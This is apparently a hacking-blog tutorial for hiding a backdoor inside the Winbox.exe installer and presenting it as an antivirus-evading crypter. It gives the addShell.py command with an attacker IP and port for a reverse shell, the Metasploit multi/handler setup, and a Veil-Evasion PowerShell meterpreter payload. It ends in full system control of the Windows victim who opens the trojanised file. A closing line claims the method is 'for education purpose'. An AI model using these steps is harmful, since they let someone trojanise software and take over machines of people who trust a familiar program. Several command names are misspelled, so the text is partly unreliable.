Crypter Backdoor To EXE - Fully Undetectable Anti Virus


The method a crypter can be executed by the vb.net and performed on the windows operating system. In background Linux, addShell.py is the solution. On the method that will learnhacker share is to combine a backdoor into the software EXE format.
In this tutorial is a winbox.exe application that will be wrapped with a backdoor / virus. To execute it is when windows user open Winbox.exe to open Mikrotik then a backdoor will follow  executed. At that moment the session meterpreter will open.

Here is the tutorial

Download addShell.py in Here 
First, Open folder addShell.py via terminal
For ses tutorial use addShell.py type in terminal python addShell.py

Next. Create backdoor/Combine a exe file to backdoor
python addShell.py -f ./winbox.exe -H 192.168.10.211 -P 5555 -p 0
Press Enter
winbox exe : The exe file to be in combine with a backdoor
-H 192.168.10.211 : Is Ip Address linux
-P 5555 : The Port to be use for access a victim

The result Precess crypter and will create a new file exe in winbox_evil format

Next run msfconsole
type msfconsole
start for create multi handler
use exloi/multi/handler
set payload windows/shell_reverse_tc

Set LHOST "Ip address Linux"
Set LPORT "Port corresponds to the port during the backdoor creation process"
Next Type Run/exploit

In Windows Victim, Run or openWinbox_evil.exe

In the Terminal will look like this
This result is if a victim success open winbox_evil
Until here you success hack a windows.
But you in Shell windows.

If you want to open the meterpreter session, this will make it easier for you to open meterpreter.
You need create a backdoor again. and you have create backdoor with msfvenom, veil_evasion, FatRat, or other Software.
In This tutorial im using Veil Evasion for Create backdoor

Select powershell/meterpreter/rev_https
This command for create backdoor bat format.
Ok, follow our tutorial
Open New terminal. So we have Two terminals  open.

Set LHOST "Ip Address Linux"
Set LPORT "New Port for Access Windows"
And
Generate

Display results as below
Payload file : Location payload
Handler File : Location Handler ( you have use the handler for open msfconsole )

Open via terminal location of handler like below.
And type msfconsole -r "name of handler"

Then result of handler like this.

Open Location bat file via file manager.
Open bat file via gedit/leafpad

Select all. And Copy this script.

Paste in first Terminal

And Then in second terminal meterpreter session will be opened like below
Type session -i for look session victim
Select session 1
And you got full system victim with all prifilage.
You have doing anything in victim OS(Windows)

Tutorial Version Video in Below


Hapy Learning.
All method for Education Purpose

Subscribe to receive free email updates:

0 Response to "Crypter Backdoor To EXE - Fully Undetectable Anti Virus"

Post a Comment